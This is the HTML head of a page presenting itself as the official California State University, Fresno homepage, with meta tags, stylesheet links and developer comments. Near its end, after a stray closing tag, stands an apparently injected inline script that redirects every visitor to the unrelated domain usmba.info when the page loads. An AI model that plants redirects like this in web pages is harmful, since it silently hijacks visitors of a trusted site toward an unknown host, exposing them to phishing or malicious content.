<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>California State University, Fresno</title>
<meta name="keywords" content="California State University Fresno, Fresno State, Fresno State Bulldogs, The Red Wave" />
<meta name="description" content="Official site for California State University, Fresno. Home of the Fresno State Bulldogs." />
<!-- Published on December 21 2015 12:05 PM by AM-->
<!-- Rob removed protocols from calls for homepage slider js and css... no backup was created... --> 
<!-- for layout -->
<link href="/home/css/index_body.css" rel="stylesheet" type="text/css" />
<link href="/home/css/quick_main_styles.css" rel="stylesheet" type="text/css" />

<!--For nav @fonts-->
<link rel="stylesheet" href="/webfontkit/font-styles.css" type="text/css" />

<!--[if IE 6]>
<link rel="stylesheet" href="//www.fresnostate.edu/home/css/ie6.css" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link rel="stylesheet" href="//www.fresnostate.edu/home/css/ie7.css" type="text/css" />
<![endif]-->

<!--For audience panel-->
<link rel="stylesheet" type="text/css" href="/home/css/slidingtabs-vertical.css" />
<link rel="stylesheet" type="text/css" href="/home/css/jquery.zrssfeed.css" />

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> <!-- min 1.7 for timeline -->
</script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
